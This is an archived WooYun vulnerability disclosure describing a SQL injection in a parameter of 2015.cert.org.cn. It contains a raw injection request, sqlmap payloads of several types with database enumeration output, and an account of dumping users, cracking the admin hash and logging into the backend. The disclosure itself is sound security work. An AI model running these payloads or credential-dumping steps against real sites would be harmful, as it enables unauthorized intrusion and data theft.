乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-08: 细节已通知厂商并且等待厂商处理中 2015-07-10: 厂商已经确认,细节仅向厂商公开 2015-07-20: 细节向核心白帽子及相关领域专家公开 2015-07-30: 细节向普通白帽子公开 2015-08-09: 细节向实习白帽子公开 2015-08-24: 细节向公众公开
为何里面没有我大乌云 !!!! 不开心 难道给我大乌云 免费赞助的位置都木有?
数据:
GET /ajax/ajax.php?action=three&callback=jQuery18206096214759163558_1436357993409&cid=10%20AND%203*2*1%3d6%20AND%20519%3d519 HTTP/1.1X-Forwarded-For: 8.8.8.8'X-Requested-With: XMLHttpRequestReferer: http://2015.cert.org.cn/Host: 2015.cert.org.cnContent-Length: 0Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
参数 cid 可注入(详情见下图以及漏洞证明)
跑了下 2015_cert_org_cn 这个数据库
用户才3个 就dump 看了下有哪些用户
解密了下 admin 的md5 登陆了后台(以下为后台截图 为何没有我大乌云)
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 333 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://2015.cert.org.cn:80/ajax/ajax.php?action=three&callback=jQuery18206096214759163558_1436357993409&cid=10 AND 3 RLIKE (SELECT (CASE WHEN (2420=2420) THEN 0x3130253230414e4425323033 ELSE 0x28 END))-- koEt21=6 AND 519=519 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://2015.cert.org.cn:80/ajax/ajax.php?action=three&callback=jQuery18206096214759163558_1436357993409&cid=10 AND 3 AND (SELECT 9977 FROM(SELECT COUNT(*),CONCAT(0x71717a7171,(SELECT (ELT(9977=9977,1))),0x7170786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- ZEJH21=6 AND 519=519 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://2015.cert.org.cn:80/ajax/ajax.php?action=three&callback=jQuery18206096214759163558_1436357993409&cid=10 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))Exdj)-- hlab21=6 AND 519=519 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: http://2015.cert.org.cn:80/ajax/ajax.php?action=three&callback=jQuery18206096214759163558_1436357993409&cid=10 AND 3 UNION ALL SELECT CONCAT(0x71717a7171,0x714f704f5a464366626c,0x7170786271),NULL,NULL-- 21=6 AND 519=519---[20:29:55] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0[20:29:55] [INFO] fetching database names[20:29:55] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique[20:29:55] [WARNING] the SQL query provided does not return any output[20:29:55] [INFO] the SQL query used returns 5 entries[20:29:55] [INFO] retrieved: information_schema[20:29:55] [INFO] retrieved: 2015_cert_org_cn[20:29:55] [INFO] retrieved: mysql[20:29:56] [INFO] retrieved: performance_schema[20:29:56] [INFO] retrieved: testavailable databases [5]:[*] 2015_cert_org_cn[*] information_schema[*] mysql[*] performance_schema[*] test[20:29:56] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\2015.cert.org.cn'
危害等级:中
漏洞Rank:10
确认时间:2015-07-10 11:59
CNVD确认并复现所述情况,已经转由CNCERT协调相关部门处置。
暂无